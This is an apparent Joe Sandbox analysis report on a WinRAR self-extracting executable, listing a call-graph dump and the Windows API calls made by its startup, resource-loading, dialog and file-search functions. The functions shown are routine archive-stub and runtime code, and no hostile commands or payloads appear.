43f3c5 24707 43f518 24706->24707 24710 43f3ef 24706->24710 24808 43f838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 24707->24808 24709 43f51f 24801 447f58 24709->24801 24719 43f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24710->24719 24746 448aed 24710->24746 24717 43f40e 24725 43f48f 24719->24725 24804 447af4 38 API calls 2 library calls 24719->24804 24721 43f495 24755 448a3e 51 API calls 24721->24755 24724 43f49d 24756 43df1e 24724->24756 24754 43f953 GetStartupInfoW _abort 24725->24754 24729 43f4b1 24729->24709 24730 43f4b5 24729->24730 24731 43f4be 24730->24731 24806 447efb 28 API calls _abort 24730->24806 24807 43f048 12 API calls ___scrt_uninitialize_crt 24731->24807 24734 43f4c6 24734->24717 24736 43eee0 24735->24736 24810 43f654 IsProcessorFeaturePresent 24736->24810 24738 43eeec 24811 442a5e 24738->24811 24740 43eef1 24745 43eef5 24740->24745 24819 448977 24740->24819 24743 43ef0c 24743->24706 24745->24706 24749 448b04 24746->24749 24747 43fbbc CatchGuardHandler 5 API calls 24748 43f408 24747->24748 24748->24717 24750 448a91 24748->24750 24749->24747 24752 448ac0 24750->24752 24751 43fbbc CatchGuardHandler 5 API calls 24753 448ae9 24751->24753 24752->24751 24753->24719 24754->24721 24755->24724 24870 430863 24756->24870 24760 43df3d 24919 43ac16 24760->24919 24762 43df46 _abort 24763 43df59 GetCommandLineW 24762->24763 24764 43dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24763->24764 24765 43df68 24763->24765 24766 424092 _swprintf 51 API calls 24764->24766 24923 43c5c4 24765->24923 24768 43e04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24766->24768 24934 43b6dd LoadBitmapW 24768->24934 24771 43dfe0 24928 43dbde 24771->24928 24772 43df76 OpenFileMappingW 24775 43dfd6 CloseHandle 24772->24775 24776 43df8f MapViewOfFile 24772->24776 24775->24764 24778 43dfa0 __InternalCxxFrameHandler 24776->24778 24779 43dfcd UnmapViewOfFile 24776->24779 24783 43dbde 2 API calls 24778->24783 24779->24775 24785 43dfbc 24783->24785 24784 4390b7 8 API calls 24786 43e0aa DialogBoxParamW 24784->24786 24785->24779 24787 43e0e4 24786->24787 24788 43e0f6 Sleep 24787->24788 24789 43e0fd 24787->24789 24788->24789 24791 43e10b 24789->24791 24964 43ae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 24789->24964 24792 43e12a DeleteObject 24791->24792 24793 43e146 24792->24793 24794 43e13f DeleteObject 24792->24794 24795 43e177 24793->24795 24796 43e189 24793->24796 24794->24793 24965 43dc3b 6 API calls 24795->24965 24961 43ac7c 24796->24961 24799 43e17d CloseHandle 24799->24796 24800 43e1c3 24805 43f993 GetModuleHandleW 24800->24805 25095 447cd5 24801->25095 24804->24725 24805->24729 24806->24731 24807->24734 24808->24709 24810->24738 24823 443b07 24811->24823 24815 442a6f 24816 442a7a 24815->24816 24837 443b43 DeleteCriticalSection 24815->24837 24816->24740 24818 442a67 24818->24740 24866 44c05a 24819->24866 24822 442a7d 7 API calls 2 library calls 24822->24745 24824 443b10 24823->24824 24826 443b39 24824->24826 24828 442a63 24824->24828 24838 443d46 24824->24838 24843 443b43 DeleteCriticalSection 24826->24843 24828->24818 24829 442b8c 24828->24829 24859 443c57 24829->24859 24832 442ba1 24832->24815 24834 442baf 24835 442bbc 24834->24835 24865 442bbf 6 API calls ___vcrt_FlsFree 24834->24865 24835->24815 24837->24818 24844 443c0d 24838->24844 24841 443d7e InitializeCriticalSectionAndSpinCount 24842 443d69 24841->24842 24842->24824 24843->24828 24845 443c26 24844->24845 24846 443c4f 24844->24846 24845->24846 24851 443b72 24845->24851 24846->24841 24846->24842 24849 443c3b GetProcAddress 24849->24846 24850 443c49 24849->24850 24850->24846 24857 443b7e ___vcrt_FlsSetValue 24851->24857 24852 443bf3 24852->24846 24852->24849 24853 443b95 LoadLibraryExW 24854 443bb3 GetLastError 24853->24854 24855 443bfa 24853->24855 24854->24857 24855->24852 24856 443c02 FreeLibrary 24855->24856 24856->24852 24857->24852 24857->24853 24858 443bd5 LoadLibraryExW 24857->24858 24858->24855 24858->24857 24860 443c0d ___vcrt_FlsSetValue 5 API calls 24859->24860 24861 443c71 24860->24861 24862 443c8a TlsAlloc 24861->24862 24863 442b96 24861->24863 24863->24832 24864 443d08 6 API calls ___vcrt_FlsSetValue 24863->24864 24864->24834 24865->24832 24869 44c073 24866->24869 24867 43fbbc CatchGuardHandler 5 API calls 24868 43eefe 24867->24868 24868->24743 24868->24822 24869->24867 24871 43ec50 24870->24871 24872 43086d GetModuleHandleW 24871->24872 24873 4308e7 24872->24873 24874 430888 GetProcAddress 24872->24874 24877 430c14 GetModuleFileNameW 24873->24877 24975 4475fb 42 API calls 2 library calls 24873->24975 24875 4308a1 24874->24875 24876 4308b9 GetProcAddress 24874->24876 24875->24876 24878 4308cb 24876->24878 24882 430c32 24877->24882 24878->24873 24880 430b54 24880->24877 24881 430b5f GetModuleFileNameW CreateFileW 24880->24881 24883 430c08 CloseHandle 24881->24883 24884 430b8f SetFilePointer 24881->24884 24889 430c94 GetFileAttributesW 24882->24889 24891 430c5d CompareStringW 24882->24891 24892 430cac 24882->24892 24966 42b146 24882->24966 24969 43081b 24882->24969 24883->24877 24884->24883 24885 430b9d ReadFile 24884->24885 24885->24883 24887 430bbb 24885->24887 24887->24883 24890 43081b 2 API calls 24887->24890 24889->24882 24889->24892 24890->24887 24891->24882 24893 430cb7 24892->24893 24896 430cec 24892->24896 24895 430cd0 GetFileAttributesW 24893->24895 24897 430ce8 24893->24897 24894 430dfb 24918 43a64d GetCurrentDirectoryW 24894->24918 24895->24893 24895->24897 24896->24894 24898 42b146 GetVersionExW 24896->24898 24897->24896 24899 430d06 24898->24899 24900 430d73 24899->24900 24901 430d0d 24899->24901 24902 424092 _swprintf 51 API calls 24900->24902 24903 43081b 2 API calls 24901->24903 24904 430d9b AllocConsole 24902->24904 24905 430d17 24903->24905 24906 430df3 ExitProcess 24904->24906 24907 430da8 GetCurrentProcessId AttachConsole 24904->24907 24908 43081b 2 API calls 24905->24908 24976 443e13 24907->24976 24909 430d21 24908->24909 24911 42e617 53 API calls 24909->24911 24913 430d3c 24911->24913 24912 430dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 24912->24906 24914 424092 _swprintf 51 API calls 24913->24914 24915 430d4f 24914->24915 24916 42e617 53 API calls 24915->24916 24917 430d5e 24916->24917 24917->24906 24918->24760 24920 43081b 2 API calls 24919->24920 24921 43ac2a OleInitialize 24920->24921 24922 43ac4d GdiplusStartup SHGetMalloc 24921->24922 24922->24762 24926 43c5ce 24923->24926 24924 43c6e4 24924->24771 24924->24772 24925 431fac CharUpperW 24925->24926 24926->24924 24926->24925 24978 42f3fa 82 API calls 2 library calls 24926->24978 24929 43ec50 24928->24929 24930 43dbeb SetEnvironmentVariableW 24929->24930 24932 43dc0e 24930->24932 24931 43dc36 24931->24764 24932->24931 24933 43dc2a SetEnvironmentVariableW 24932->24933 24933->24931 24935 43b70b GetObjectW 24934->24935 24936 43b6fe 24934->24936 24937 43b71a 24935->24937 24979 43a6c2 FindResourceW 24936->24979 24939 43a5c6 4 API calls 24937->24939 24942 43b72d 24939->24942 24941 43b770 24953 42da42 24941->24953 24942->24941 24943 43b74c 24942->24943 24944 43a6c2 12 API calls 24942->24944 24993 43a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24943->24993 24946 43b73d 24944->24946 24946->24943 24948 43b743 DeleteObject 24946->24948 24947 43b754 24994 43a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24947->24994 24948->24943 24950 43b75d 24995 43a80c 8 API calls 24950->24995 24952 43b764 DeleteObject 24952->24941 25004 42da67 24953->25004 24958 4390b7 24959 43eb38 8 API calls 24958->24959 24960 4390d6 24959->24960 24960->24784 24962 43acab GdiplusShutdown CoUninitialize 24961->24962 24962->24800 24964->24791 24965->24799 24967 42b196 24966->24967 24968 42b15a GetVersionExW 24966->24968 24967->24882 24968->24967 24970 43ec50 24969->24970 24971 430828 GetSystemDirectoryW 24970->24971 24972 430840 24971->24972 24973 43085e 24971->24973 24974 430851 LoadLibraryW 24972->24974 24973->24882 24974->24973 24975->24880 24977 443e1b 24976->24977 24977->24912 24977->24977 24978->24926 24980 43a6e5 SizeofResource 24979->24980 24981 43a7d3 24979->24981 24980->24981 24982 43a6fc LoadResource 24980->24982 24981->24935 24981->24937 24982->24981 24983 43a711 LockResource 24982->24983 24983->24981 24984 43a722 GlobalAlloc 24983->24984 24984->24981 24985 43a73d GlobalLock 24984->24985 24986 43a7cc GlobalFree 24985->24986 24987 43a74c __InternalCxxFrameHandler 24985->24987 24986->24981 24988 43a7c5 GlobalUnlock 24987->24988 24996 43a626 GdipAlloc 24987->24996 24988->24986 24991 43a7b0 24991->24988 24992 43a79a GdipCreateHBITMAPFromBitmap 24992->24991 24993->24947 24994->24950 24995->24952 24997 43a645 24996->24997 24998 43a638 24996->24998 24997->24988 24997->24991 24997->24992 25000 43a3b9 24998->25000 25001 43a3e1 GdipCreateBitmapFromStream 25000->25001 25002 43a3da GdipCreateBitmapFromStreamICM 25000->25002 25003 43a3e6 25001->25003 25002->25003 25003->24997 25005 42da75 _wcschr __EH_prolog 25004->25005 25006 42daa4 GetModuleFileNameW 25005->25006 25007 42dad5 25005->25007 25008 42dabe 25006->25008 25050 4298e0 25007->25050 25008->25007 25010 42db31 25061 446310 25010->25061 25011 42959a 80 API calls 25012 42da4e 25011->25012 25048 42e29e GetModuleHandleW FindResourceW 25012->25048 25014 42db05 25014->25010 25016 42e261 78 API calls 25014->25016 25028 42dd4a 25014->25028 25015 42db44 25017 446310 26 API calls 25015->25017 25016->25014 25025 42db56 ___vcrt_FlsSetValue 25017->25025 25018 42dc85 25018->25028 25081 429d70 81 API calls 25018->25081 25020 429e80 79 API calls 25020->25025 25022 42dc9f ___std_exception_copy 25023 429bd0 82 API calls 25022->25023 25022->25028 25026 42dcc8 ___std_exception_copy 25023->25026 25025->25018 25025->25020 25025->25028 25075 429bd0 25025->25075 25080 429d70 81 API calls 25025->25080 25026->25028 25045 42dcd3 ___vcrt_FlsSetValue _wcslen ___std_exception_copy 25026->25045 25082 431b84 MultiByteToWideChar 25026->25082 25028->25011 25029 42e159 25035 42e1de 25029->25035 25088 448cce 26 API calls 2 library calls 25029->25088 25031 42e16e 25089 447625 26 API calls 2 library calls 25031->25089 25033 42e1c6 25090 42e27c 78 API calls 25033->25090 25034 42e214 25038 446310 26 API calls 25034->25038 25035->25034 25041 42e261 78 API calls 25035->25041 25039 42e22d 25038->25039 25040 446310 26 API calls 25039->25040 25040->25028 25041->25035 25043 431da7 WideCharToMultiByte 25043->25045 25045->25028 25045->25029 25045->25043 25083 42e5b1 50 API calls __vsnprintf 25045->25083 25084 446159 26 API calls 3 library calls 25045->25084 25085 448cce 26 API calls 2 library calls 25045->25085 25086 447625 26 API calls 2 library calls 25045->25086 25087 42e27c 78 API calls 25045->25087 25049 42da55 25048->25049 25049->24958 25051 4298ea 25050->25051 25052 42994b CreateFileW 25051->25052 25053 42996c GetLastError 25052->25053 25057 4299bb 25052->25057 25054 42bb03 GetCurrentDirectoryW 25053->25054 25055 42998c 25054->25055 25056 429990 CreateFileW GetLastError 25055->25056 25055->25057 25056->25057 25059 4299b5 25056->25059 25058 4299ff 25057->25058 25060 4299e5 SetFileTime 25057->25060 25058->25014 25059->25057 25060->25058 25062 446349 25061->25062 25063 44634d 25062->25063 25074 446375 25062->25074 25091 4491a8 20 API calls __dosmaperr 25063->25091 25065 446352 25092 449087 26 API calls _abort 25065->25092 25066 446699 25068 43fbbc CatchGuardHandler 5 API calls 25066->25068 25070 4466a6 25068->25070 25069 44635d 25071 43fbbc CatchGuardHandler 5 API calls 25069->25071 25070->25015 25072 446369 25071->25072 25072->25015 25074->25066 25093 446230 5 API calls CatchGuardHandler 25074->25093 25076 429bdc 25075->25076 25078 429be3 25075->25078 25076->25025 25078->25076 25079 429785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25078->25079 25094 426d1a 77 API calls 25078->25094 25079->25078 25080->25025 25081->25022 25082->25045 25083->25045 25084->25045 25085->25045 25086->25045 25087->25045 25088->25031 25089->25033 25090->25035 25091->25065 25092->25069 25093->25074 25094->25078 25096 447ce1 _unexpected 25095->25096 25097 447ce8 25096->25097 25098 447cfa 25096->25098 25131 447e2f GetModuleHandleW 25097->25131 25119 44ac31 EnterCriticalSection 25098->25119 25101 447ced 25101->25098 25132 447e73 GetModuleHandleExW 25101->25132 25102 447d9f 25120 447ddf 25102->25120 25106 447d01 25106->25102 25108 447d76 25106->25108 25140 4487e0 20 API calls _abort 25106->25140 25109 447d8e 25108->25109 25113 448a91 _abort 5 API calls 25108->25113 25114 448a91 _abort 5 API calls 25109->25114 25110 447dbc 25123 447dee 25110->25123 25111 447de8 25141 452390 5 API calls CatchGuardHandler 25111->25141 25113->25109 25114->25102 25119->25106 25142 44ac81 LeaveCriticalSection 25120->25142 25122 447db8 25122->25110 25122->25111 25143 44b076 25123->25143 25126 447e1c 25129 447e73 _abort 8 API calls 25126->25129 25127 447dfc GetPEB 25127->25126 25128 447e0c GetCurrentProcess TerminateProcess 25127->25128 25128->25126 25130 447e24 ExitProcess 25129->25130 25131->25101 25133 447ec0 25132->25133 25134 447e9d GetProcAddress 25132->25134 25135 447ec6 FreeLibrary 25133->25135 25136 447ecf 25133->25136 25137 447eb2 25134->25137 25135->25136 25138 43fbbc CatchGuardHandler 5 API calls 25136->25138 25137->25133 25139 447cf9 25138->25139 25139->25098 25140->25108 25142->25122 25144 44b09b 25143->25144 25147 44b091 25143->25147 25145 44ac98 _unexpected 5 API calls 25144->25145 25145->25147 25146 43fbbc CatchGuardHandler 5 API calls 25148 447df8 25146->25148 25147->25146 25148->25126 25148->25127 25339 43b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 25379 431bbd GetCPInfo IsDBCSLeadByte

                                                              Executed Functions

                                                              Function 0043DF1E Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 195filesleeptimeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00430863: GetModuleHandleW.KERNEL32(kernel32), ref: 0043087C
                                                                • Part of subcall function 00430863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0043088E
                                                                • Part of subcall function 00430863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004308BF
                                                                • Part of subcall function 0043A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0043A655
                                                                • Part of subcall function 0043AC16: OleInitialize.OLE32(00000000), ref: 0043AC2F
                                                                • Part of subcall function 0043AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0043AC66
                                                                • Part of subcall function 0043AC16: SHGetMalloc.SHELL32(00468438), ref: 0043AC70
                                                              • GetCommandLineW.KERNEL32 ref: 0043DF5C
                                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0043DF83
                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0043DF94
                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0043DFCE
                                                                • Part of subcall function 0043DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0043DBF4
                                                                • Part of subcall function 0043DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0043DC30
                                                              • CloseHandle.KERNEL32(00000000), ref: 0043DFD7
                                                              • GetModuleFileNameW.KERNEL32(00000000,0047EC90,00000800), ref: 0043DFF2
                                                              • SetEnvironmentVariableW.KERNEL32(sfxname,0047EC90), ref: 0043DFFE
                                                              • GetLocalTime.KERNEL32(?), ref: 0043E009
                                                              • _swprintf.LIBCMT ref: 0043E048
                                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0043E05A
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0043E061
                                                              • LoadIconW.USER32(00000000,00000064), ref: 0043E078
                                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0043E0C9
                                                              • Sleep.KERNEL32(?), ref: 0043E0F7
                                                              • DeleteObject.GDI32 ref: 0043E130
                                                              • DeleteObject.GDI32(?), ref: 0043E140
                                                              • CloseHandle.KERNEL32 ref: 0043E183
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xzG
                                                              • API String ID: 3049964643-3170321481
                                                              • Opcode ID: e51c60f3f324e2bad77c1b0a8f7156932ac95cd18179f8aa1da66c1270a1031a
                                                              • Instruction ID: f4a5b70370df261df859dc905778fb052f9bb8e77de9587d8240c127c44476f0
                                                              • Opcode Fuzzy Hash: e51c60f3f324e2bad77c1b0a8f7156932ac95cd18179f8aa1da66c1270a1031a
                                                              • Instruction Fuzzy Hash: A561E531904305AFD720AF72AC49B2B77ACAB09749F04143FF945922D2EBBC9944C76E
                                                              Function 0043A6C2 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 100memorywindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 802 43a6c2-43a6df FindResourceW 803 43a6e5-43a6f6 SizeofResource 802->803 804 43a7db 802->804 803->804 806 43a6fc-43a70b LoadResource 803->806 805 43a7dd-43a7e1 804->805 806->804 807 43a711-43a71c LockResource 806->807 807->804 808 43a722-43a737 GlobalAlloc 807->808 809 43a7d3-43a7d9 808->809 810 43a73d-43a746 GlobalLock 808->810 809->805 811 43a7cc-43a7cd GlobalFree 810->811 812 43a74c-43a76a call 440320 810->812 811->809 816 43a7c5-43a7c6 GlobalUnlock 812->816 817 43a76c-43a78e call 43a626 812->817 816->811 817->816 822 43a790-43a798 817->822 823 43a7b3-43a7c1 822->823 824 43a79a-43a7ae GdipCreateHBITMAPFromBitmap 822->824 823->816 824->823 825 43a7b0 824->825 825->823
                                                              APIs
                                                              • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0043B73D,00000066), ref: 0043A6D5
                                                              • SizeofResource.KERNEL32(00000000,?,?,?,0043B73D,00000066), ref: 0043A6EC
                                                              • LoadResource.KERNEL32(00000000,?,?,?,0043B73D,00000066), ref: 0043A703
                                                              • LockResource.KERNEL32(00000000,?,?,?,0043B73D,00000066), ref: 0043A712
                                                              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0043B73D,00000066), ref: 0043A72D
                                                              • GlobalLock.KERNEL32(00000000), ref: 0043A73E
                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0043A762
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0043A7C6
                                                                • Part of subcall function 0043A626: GdipAlloc.GDIPLUS(00000010), ref: 0043A62C
                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0043A7A7
                                                              • GlobalFree.KERNEL32(00000000), ref: 0043A7CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                              • String ID: FjunC$PNG
                                                              • API String ID: 211097158-2777305062
                                                              • Opcode ID: 2cac095efd2ff056d19f5076b4abc9127363cc0ab22775a51342d47a0f7358cc
                                                              • Instruction ID: 52aceddbd7808be46800af9523d255ddfb276d4ac68618c6254f480e2f290831
                                                              • Opcode Fuzzy Hash: 2cac095efd2ff056d19f5076b4abc9127363cc0ab22775a51342d47a0f7358cc
                                                              • Instruction Fuzzy Hash: 5231C475600702AFD7119F31DC88D1BBBB8EF88792F04052AF84582761EB35DC54DA6A
                                                              Function 0042A69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1032 42a69b-42a6bf call 43ec50 1035 42a6c1-42a6ce FindFirstFileW 1032->1035 1036 42a727-42a730 FindNextFileW 1032->1036 1037 42a742-42a7ff call 430602 call 42c310 call 4315da * 3 1035->1037 1038 42a6d0-42a6e2 call 42bb03 1035->1038 1036->1037 1039 42a732-42a740 GetLastError 1036->1039 1045 42a804-42a811 1037->1045 1047 42a6e4-42a6fc FindFirstFileW 1038->1047 1048 42a6fe-42a707 GetLastError 1038->1048 1041 42a719-42a722 1039->1041 1041->1045 1047->1037 1047->1048 1050 42a717 1048->1050 1051 42a709-42a70c 1048->1051 1050->1041 1051->1050 1053 42a70e-42a711 1051->1053 1053->1050 1055 42a713-42a715 1053->1055 1055->1041
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0042A592,000000FF,?,?), ref: 0042A6C4
                                                                • Part of subcall function 0042BB03: _wcslen.LIBCMT ref: 0042BB27
                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0042A592,000000FF,?,?), ref: 0042A6F2
                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0042A592,000000FF,?,?), ref: 0042A6FE
                                                              • FindNextFileW.KERNEL32(?,?,?,?,?,?,0042A592,000000FF,?,?), ref: 0042A728
                                                              • GetLastError.KERNEL32(?,?,?,?,0042A592,000000FF,?,?), ref: 0042A734
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                              • String ID:
                                                              • API String ID: 42610566-0
                                                              • Opcode ID: ecf6c0bc380f9d2f274fb17c5f3c7d1d5f81b2cce588752534a0cc77b997648e
                                                              • Instruction ID: 65129bf79127adfa3a74fa91f9ea585ef033bf6f0900cf2daa3253ae3a15000a
                                                              • Opcode Fuzzy Hash: ecf6c0bc380f9d2f274fb17c5f3c7d1d5f81b2cce588752534a0cc77b997648e
                                                              • Instruction Fuzzy Hash: 5441B631600225ABC715DF64DC88ADAF7B8FB48351F004196E95DE3240D738AEA0CF98
                                                              Function 00447DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00000000,?,00447DC4,00000000,0045C300,0000000C,00447F1B,00000000,00000002,00000000), ref: 00447E0F
                                                              • TerminateProcess.KERNEL32(00000000,?,00447DC4,00000000,0045C300,0000000C,00447F1B,00000000,00000002,00000000), ref: 00447E16
                                                              • ExitProcess.KERNEL32 ref: 00447E28
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: 858fb8a8abe39c5e2d62041f73c4eff13e939e881f1d8d4932d353165cd5883f
                                                              • Instruction ID: 047be875d5f0e01aca56c336090aa5f40522fd5ba5756737bf251f9ecc6cfe2b
                                                              • Opcode Fuzzy Hash: 858fb8a8abe39c5e2d62041f73c4eff13e939e881f1d8d4932d353165cd5883f
                                                              • Instruction Fuzzy Hash: ECE04631000248ABDF026F21CD09A4A3F6AEB10787B104469F8098B232CB3ADE52CA88
                                                              Function 0042848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 3b568796536e41155c42f7a48d3d79a3dea4dc50cdf4b8077581b57862d1c4cb
                                                              • Instruction ID: 9a2b253fb3bd0d7ba4a18f12e148124ed333d9e854936e301b0f7a7d40f80960
                                                              • Opcode Fuzzy Hash: 3b568796536e41155c42f7a48d3d79a3dea4dc50cdf4b8077581b57862d1c4cb
                                                              • Instruction Fuzzy Hash: 19820B70B05165AEDF15DB60D881BFEB769AF05304F8841BFE8499B242CB385A84C768
                                                              Function 0043B7E0 Relevance: 109.2, APIs: 48, Strings: 14, Instructions: 731windowfilesleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0043B7E5
                                                                • Part of subcall function 00421316: GetDlgItem.USER32(00000000,00003021), ref: 0042135A
                                                                • Part of subcall function 00421316: SetWindowTextW.USER32(00000000,004535F4), ref: 00421370
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0043B8D1
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0043B8EF
                                                              • IsDialogMessageW.USER32(?,?), ref: 0043B902
                                                              • TranslateMessage.USER32(?), ref: 0043B910
                                                              • DispatchMessageW.USER32(?), ref: 0043B91A
                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0043B93D
